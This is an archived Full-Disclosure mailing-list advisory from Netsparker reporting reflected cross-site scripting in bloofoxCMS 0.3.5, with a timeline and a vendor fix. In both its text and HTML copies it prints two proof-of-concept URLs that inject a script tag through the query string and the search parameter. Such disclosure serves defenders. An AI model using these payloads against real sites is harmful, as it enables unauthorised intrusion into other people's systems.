[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] XSS Vulnerabilities in bloofoxCMS
From:       Netsparker Advisories <advisories () mavitunasecurity ! com>
Date:       2012-10-31 21:20:37
Message-ID: CAESCr8OOQ2E2biCoNS5GY2khL2khCuoGX7JHqXpZk=QJdC1-zA () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Information
--------------------
Name :  XSS Vulnerabilities in bloofoxCMS
Software :  bloofoxCMS 0.3.5 and possibly below.
Vendor Homepage :  http://www.bloofox.com
Vulnerability Type :  Cross-Site Scripting
Severity :  Critical
Researcher :  Canberk Bolat
Advisory Reference :  NS-12-015

Description
--------------------
bloofoxCMS is a free open source content management system (CMS).
bloofoxCMS is a small and easy to use CMS. It enables you to manage
websites and intranet sites on a very simple way. It is slim but also
flexible.

Details
--------------------
bloofoxCMS is affected by XSS vulnerabilities in version 0.3.5

http://example.com/index.php?'"--><script>alert(0x0004B3)</script>
http://example.com/index.php?search='"--><script>alert(0x0004B3)</script>
You can read the full article about Cross-Site Scripting from here:

Cross-site Scripting (XSS)
Solution
--------------------
The vendor fixed this vulnerability in the new version. Please see the
references.

Advisory Timeline
--------------------
23/01/2011 - First contact
25/02/2012 - Vulnerability Fixed
31/10/2012 - Advisory released

Credits
--------------------
It has been discovered on testing of Netsparker, Web Application Security
Scanner - http://www.mavitunasecurity.com/netsparker/.

References
--------------------
Vendor Url / Patch : http://www.bloofox.com/change_log.24.html
MSL Advisory Link :
http://www.mavitunasecurity.com/xss-vulnerabilities-in-bloofoxcms/
Netsparker Advisories :
http://www.mavitunasecurity.com/netsparker-advisories/

About Netsparker
--------------------
Netsparker® can find and report security issues such as SQL Injection and
Cross-site Scripting (XSS) in all web applications regardless of the
platform and the technology they are built on. Netsparker's unique
detection and exploitation techniques allows it to be dead accurate in
reporting hence it's the first and the only False Positive Free web
application security scanner.

-- 
Netsparker Advisories, <advisories@mavitunasecurity.com>
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

[Attachment #5 (text/html)]

<p>Information <br>-------------------- <br>Name :  XSS Vulnerabilities in bloofoxCMS \
<br>Software :  bloofoxCMS 0.3.5 and possibly below. <br>Vendor Homepage :  <a \
href="http://www.bloofox.com">http://www.bloofox.com</a> <br> Vulnerability Type :  Cross-Site \
Scripting <br>Severity :  Critical <br>Researcher :  Canberk Bolat <br>Advisory Reference :  \
NS-12-015</p><p>Description <br>-------------------- <br>bloofoxCMS is a free open source \
content management system (CMS). bloofoxCMS is a small and easy to use CMS. It enables you to \
manage websites and intranet sites on a very simple way. It is slim but also flexible.</p> \
<p>Details <br>-------------------- <br>bloofoxCMS is affected by XSS vulnerabilities in \
version 0.3.5</p><p><a \
href="http://example.com/index.php?&#39;&quot;--&gt;&lt;script&gt;alert(0x0004B3)&lt;/script">ht \
tp://example.com/index.php?&#39;&quot;--&gt;&lt;script&gt;alert(0x0004B3)&lt;/script</a>&gt;<br>
 <a href="http://example.com/index.php?search=&#39;&quot;--&gt;&lt;script&gt;alert(0x0004B3)&lt; \
/script">http://example.com/index.php?search=&#39;&quot;--&gt;&lt;script&gt;alert(0x0004B3)&lt;/script</a>&gt;<br>You \
can read the full article about Cross-Site Scripting from here:</p> <p>Cross-site Scripting \
(XSS)<br>Solution <br>-------------------- <br>The vendor fixed this vulnerability in the new \
version. Please see the references.</p><p>Advisory Timeline <br>-------------------- \
<br>23/01/2011 - First contact <br> 25/02/2012 - Vulnerability Fixed <br>31/10/2012 - Advisory \
released</p><p>Credits <br>-------------------- <br>It has been discovered on testing of \
Netsparker, Web Application Security Scanner - <a \
href="http://www.mavitunasecurity.com/netsparker/">http://www.mavitunasecurity.com/netsparker/</a>.</p>
 <p>References <br>-------------------- <br>Vendor Url / Patch : <a \
href="http://www.bloofox.com/change_log.24.html">http://www.bloofox.com/change_log.24.html</a> \
<br>MSL Advisory Link : <a \
href="http://www.mavitunasecurity.com/xss-vulnerabilities-in-bloofoxcms/">http://www.mavitunasecurity.com/xss-vulnerabilities-in-bloofoxcms/</a> \
<br> Netsparker Advisories : <a \
href="http://www.mavitunasecurity.com/netsparker-advisories/">http://www.mavitunasecurity.com/netsparker-advisories/</a></p><p>About \
Netsparker <br>-------------------- <br>Netsparker® can find and report security issues such as \
SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform \
and the technology they are built on. Netsparker&#39;s unique detection and exploitation \
techniques allows it to be dead accurate in reporting hence it&#39;s the first and the only \
False Positive Free web application security scanner.<br clear="all"> <br>-- <br>Netsparker \
Advisories, &lt;<a href="mailto:advisories@mavitunasecurity.com" \
target="_blank">advisories@mavitunasecurity.com</a>&gt;</p><div>Homepage, <a \
href="http://www.mavitunasecurity.com/netsparker-advisories/" \
target="_blank">http://www.mavitunasecurity.com/netsparker-advisories/</a></div> <br>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic